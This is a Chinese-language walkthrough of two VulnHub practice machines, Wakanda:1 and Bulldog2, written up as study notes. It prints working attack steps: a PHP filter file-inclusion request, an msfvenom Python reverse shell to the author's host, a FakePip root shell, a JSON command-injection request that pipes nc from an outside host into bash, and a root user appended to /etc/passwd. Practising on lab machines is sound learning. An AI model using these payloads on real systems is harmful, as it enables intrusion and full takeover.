靶机渗透学习(wakanda,bulldog2)

pentest

wakanda:1

安装和介绍

https://www.vulnhub.com/entry/wakanda-1,251/

ip和端口

靶机ip:192.168.1.102 端口信息 blacsheep

拿shell

去80端口看下,发现没有可以响应的网页 blacsheep dirb扫一下 blacsheep 可以看到size都是0,没突破口 再回去看网页源码的时候发现有一行注释

1
<!-- <a class="nav-link active" href="?lang=fr">Fr/a> -->

我们访问一下,发现页面不一样 blacsheep 猜测存在文件包含,去看下有没有fr.php,发现存在 blacsheep 试试文件包含

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
root@kali:/home/blacsheep# curl "http://192.168.1.102/?lang=php://filter/read=convert.base64-encode/resource=index"  base64 -d
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  3815  100  3815    0     0  3725k      0 --:--:-- --:--:-- --:--:-- 3725k
<?php
$password ="Niamey4Ever227!!!" ;//I have to remember it

if (isset($_GET['lang']))
{
include($_GET['lang'].".php");
}

?>



<!DOCTYPE html>
<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="Vibranium market">
    <meta name="author" content="mamadou">

    <title>Vibranium Market</title>


    <link href="bootstrap.css" rel="stylesheet">


    <link href="cover.css" rel="stylesheet">
  </head>

  <body class="text-center">

    <div class="cover-container d-flex w-100 h-100 p-3 mx-auto flex-column">
      <header class="masthead mb-auto">
        <div class="inner">
          <h3 class="masthead-brand">Vibranium Market</h3>
          <nav class="nav nav-masthead justify-content-center">
            <a class="nav-link active" href="#">Home</a>
            <!-- <a class="nav-link active" href="?lang=fr">Fr/a> -->
          </nav>
        </div>
      </header>

      <main role="main" class="inner cover">
        <h1 class="cover-heading">Coming soon</h1>
        <p class="lead">
          <?php
            if (isset($_GET['lang']))
          {
          echo $message;
          }
          else
          {
            ?>

            Next opening of the largest vibranium market. The products come directly from the wakanda. stay tuned!
            <?php
          }
?>
        </p>
        <p class="lead">
          <a href="#" class="btn btn-lg btn-secondary">Learn more</a>
        </p>
      </main>

      <footer class="mastfoot mt-auto">
        <div class="inner">
          <p>Made by<a href="#">@mamadou</a></p>
        </div>
      </footer>
    </div>

找到一个密码,去试试ssh 帐号可以用之前页面上的mamadou blacsheep 然后连上去了 blacsheep 权限是mamadou blacsheep

提权

sudo -l一下

1
2
3
mamadou@Wakanda1:~$ sudo -l
[sudo] password for mamadou: 
Sorry, user mamadou may not run sudo on Wakanda1.

帐号没有sudo的权限 找一下线索,读/etc/passwd发现一个devops用户 找下这个用户的文件

1
2
mamadou@Wakanda1:~$ find / -user devops 2>/dev/null
/srv/.antivirus.py

发现一个py文件,看下内容

1
open('/tmp/test','w').write('test')

猜测是开机运行的脚本,那么看下权限能不能对文件进行修改

1
2
3
4
5
mamadou@Wakanda1:/srv$ ls -al
total 12
drwxr-xr-x  2 root   root      4096 Aug  1 17:52 .
drwxr-xr-x 22 root   root      4096 Aug  1 13:05 ..
-rw-r--rw-  1 devops developer  446 Sep 16 08:41 .antivirus.py

发现其他用户有写权限,那么直接写进木马,用msfvenom生成

1
2
3
4
5
6
root@kali:/home/blacsheep# msfvenom -p cmd/unix/reverse_python lhost=192.168.1.105 lport=4445 R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 497 bytes
python -c "exec('aW1wb3J0IHNvY2tldCAgICwgIHN1YnByb2Nlc3MgICAsICBvcyAgICAgOyAgICAgaG9zdD0iMTkyLjE2OC4xLjEwNSIgICAgIDsgICAgIHBvcnQ9NDQ0NSAgICAgOyAgICAgcz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVUICAgLCAgc29ja2V0LlNPQ0tfU1RSRUFNKSAgICAgOyAgICAgcy5jb25uZWN0KChob3N0ICAgLCAgcG9ydCkpICAgICA7ICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAsICAwKSAgICAgOyAgICAgb3MuZHVwMihzLmZpbGVubygpICAgLCAgMSkgICAgIDsgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICwgIDIpICAgICA7ICAgICBwPXN1YnByb2Nlc3MuY2FsbCgiL2Jpbi9iYXNoIik='.decode('base64'))"

然后把exec的部分写进去 blacsheep 本地监听然后靶机重启 blacsheep 拿到devops权限,然后sudo -l

1
2
3
4
5
6
7
8
devops@Wakanda1:/$ sudo -l
sudo -l
Matching Defaults entries for devops on Wakanda1:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User devops may run the following commands on Wakanda1:
    (ALL) NOPASSWD: /usr/bin/pip

发现可以root执行pip,这里有个trick,有个叫做Fakepip的东西可以反弹shell,github:https://github.com/0x00-0x00/FakePip glone下来之后改一下ip,然后写个webshell方便传文件,我们这里写到/tmp下面 blacsheep 然后监听好,devops执行命令

1
sudo -u root /usr/bin/pip install . --upgrade --force-reinstall

blacsheep 反弹的shell在443收到 blacsheep

bulldog2

介绍和下载

https://www.vulnhub.com/entry/bulldog-2,246/

ip和端口

靶机ip:192.168.43.121 扫端口 blacsheep 只开了80端口

进一步信息收集

只开了80,那我们去80端口看下 blacsheep 测试一下,发现几乎没什么功能,注册也关闭了 后来去一个用户信息页面的时候尝试注入,结果得到了错误回显 访问页面

1
http://192.168.43.121/profile/lrberna%df'

blacsheep 发现是nodejs,然后发现web目录中的关键词Bulldog-2-The-Reckoning 我们去github搜一下 然后找到原仓库https://github.com/Frichetten/Bulldog-2-The-Reckoning blacsheep 开始代码审计

getshell

看web代码还是习惯先看router,方便了解网站的功能 一打开router就发现

1
const {exec} = require('child_process');

ctrl+f搜一下,发现关键代码 blacsheep 即在/linkauthenticate页面存在一个任意代码执行漏洞 burp抓下包,改post和路径,带上命令注入的信息,注意带上Content-type: application/json 我们ping一下,本机tcpdump -nni wlan0 icmp blacsheep 得到回显,本来这里应该直接反弹shell的,但是不知道为什么反弹不了,猜测是字符的问题,所以换了个方式,我们payload里面让nc获得的信息用管道符转到bash,然后在nc里面让它执行反弹shell的命令,最后我们的数据包如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
POST /users/linkauthenticate HTTP/1.1
Host: 192.168.43.121
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36
Accept: text/html,application/xhtml+xml,application/json;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
If-None-Match: W/"465-1649e73083e"
If-Modified-Since: Sun, 15 Jul 2018 14:58:16 GMT
Connection: close
Content-type: application/json
Content-Length: 77

{
 "username": "123",
 "password": ";nc 192.168.43.245 6712  /bin/bash"
}

然后拿到shell blacsheep

提权

没有用户的密码,但是我们可以看下本机有没有什么配置问题导致可以提权

1
2
3
4
node@bulldog2:/var/www/node/Bulldog-2-The-Reckoning$ ls -l /etc  grep passwd
ls -l /etc  grep passwd
-rwxrwxrwx 1 root root       1728 Sep 17 04:46 passwd
-rw-r--r-- 1 root root       1650 Jul 15 04:06 passwd-

发现passwd是可写的,那么我们直接写入一个新的用户就可以了 用openssl生成密码

1
2
3
ode@bulldog2:/var/www/node/Bulldog-2-The-Reckoning$ openssl passwd -1 -salt cnss blacsheep
s blacsheepswd -1 -salt cnss
$1$cnss$LUsyAIs8qkoK/EBDFmYs61

构造一个新的用户

1
blacsheep:$1$cnss$LUsyAIs8qkoK/EBDFmYs61:0:0:,,,:/home/node:/bin/bash

然后echo到passwd里

1
echo "blacsheep:\$1\$cnss\$LUsyAIs8qkoK/EBDFmYs61:0:0:,,,:/home/node:/bin/bash">>/etc/passwd

注意这里的\$转义一下 然后就拿到root了 blacsheep